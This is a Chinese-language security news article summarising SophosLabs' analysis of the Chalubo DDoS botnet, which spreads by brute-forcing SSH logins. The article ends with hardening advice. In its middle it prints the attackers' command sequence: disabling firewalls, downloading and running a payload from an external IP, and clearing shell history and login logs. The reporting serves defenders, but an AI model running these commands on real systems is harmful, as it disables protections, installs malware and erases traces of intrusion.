技術(shù)
導(dǎo)讀:攻擊者使用了ChaCha流密碼來(lái)加密Chalubo的主組件以及相應(yīng)的Lua腳本,而在最新的版本中,攻擊者已經(jīng)采用了更常見的Windows惡意軟件原理來(lái)阻止對(duì)Chalubo的檢測(cè)。不變的是,最新版本的Chalubo同樣整合了來(lái)自Xor.DDoS和Mirai惡意軟件家族的代碼。
網(wǎng)絡(luò)安全公司Sophos旗下SophosLabs在本周一(10月22日)發(fā)表的一篇博文中指出,他們近兩個(gè)月一直在持續(xù)關(guān)注一場(chǎng)開始于9月初的網(wǎng)絡(luò)攻擊活動(dòng),目標(biāo)是開啟了SSH服務(wù)器的Linux服務(wù)器。而在這場(chǎng)攻擊活動(dòng)中,攻擊者的主要目的在于傳播一種被他們稱之為“Chalubo”的最新自動(dòng)化DDos攻擊工具。
SophosLabs的分析表明,攻擊者使用了ChaCha流密碼來(lái)加密Chalubo的主組件以及相應(yīng)的Lua腳本,而在最新的版本中,攻擊者已經(jīng)采用了更常見的Windows惡意軟件原理來(lái)阻止對(duì)Chalubo的檢測(cè)。不變的是,最新版本的Chalubo同樣整合了來(lái)自Xor.DDoS和Mirai惡意軟件家族的代碼。
在8月下旬開始傳播,目前已有多個(gè)版本
根據(jù)SophosLabs的說法,Chalubo于8月下旬開始通過網(wǎng)絡(luò)感染目標(biāo)設(shè)備,攻擊者隨后會(huì)通過在受感染設(shè)備上發(fā)出命令來(lái)檢索它。Chalubo實(shí)際上由三部分組成:下載模塊(downloader)、主bot程序(最初僅能夠在具有x86處理器架構(gòu)的系統(tǒng)上運(yùn)行)和Lua命令腳本。
到了10月中旬,攻擊者開始發(fā)出檢索Elknot dropper(檢測(cè)為L(zhǎng)inux/DDoS-AZ)的命令,它被用于提供Chalubo(ChaCha-Lua-bot)軟件包的其余部分。
此外,目前已經(jīng)出現(xiàn)了能夠在不同處理器架構(gòu)上運(yùn)行的各種bot程序版本,包括32位和64位的ARM、x86、x86_64、MIPS、MIPSEL和PowerPC。這可能表明,這場(chǎng)網(wǎng)絡(luò)攻擊活動(dòng)的測(cè)試階段已經(jīng)結(jié)束,或許我們之后會(huì)看到基于Chalubo攻擊活動(dòng)數(shù)量的持續(xù)上升。
嘗試暴力破解密碼,強(qiáng)制登錄SSH服務(wù)器
SophosLabs表示,由他們部署的蜜罐系統(tǒng)最初在2018年9月6日記錄了相關(guān)攻擊。Chalubo的bot程序首先會(huì)嘗試暴力破解密碼,以強(qiáng)制登錄SSH服務(wù)器。
一旦攻擊者獲得了對(duì)目標(biāo)設(shè)備的訪問權(quán)限,他們就會(huì)發(fā)出以下命令:
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/
chmod 777 /usr/bin/libsdes
nohup /usr/bin/libsdes > /dev/null 2>&1 &
export HISTFILE=/dev/null
rm -f /var/log/wtmp
history -c
雖然攻擊手法十分常見,但攻擊者使用了分層方法來(lái)下載惡意組件,并且使用的加密方法對(duì)于Linux惡意軟件而言,也是我們所不常見的。
事實(shí)上,如果仔細(xì)查看負(fù)責(zé)持續(xù)攻擊的代碼段的話,我們能夠發(fā)現(xiàn)Chalubo已經(jīng)從Xor.DDoS惡意軟件家族中復(fù)制了DelService和AddService函數(shù)。另外,一些代碼段復(fù)制于Mirai惡意軟件,如一些隨機(jī)函數(shù)和util_local_addr函數(shù)的擴(kuò)展代碼。
SophosLabs提出的一些預(yù)防建議和防范措施
由于Chalubo感染目標(biāo)系統(tǒng)的主要方法是通過對(duì)使用通用的用戶名和密碼組合對(duì)SSH服務(wù)器的登錄憑證進(jìn)行暴力破解,因此SophosLabs建議SSH服務(wù)器的系統(tǒng)管理員(包括嵌入式設(shè)備)應(yīng)更改這些設(shè)備上的默認(rèn)密碼。如果可能的話,系統(tǒng)管理員最好使用SSH密鑰,而不是登錄密碼。
此外,與其他任何設(shè)備一樣,保持系統(tǒng)更新、及時(shí)安裝官方發(fā)布的修復(fù)補(bǔ)丁,以及安裝實(shí)用的防病毒軟件都會(huì)是很好的主動(dòng)防御措施。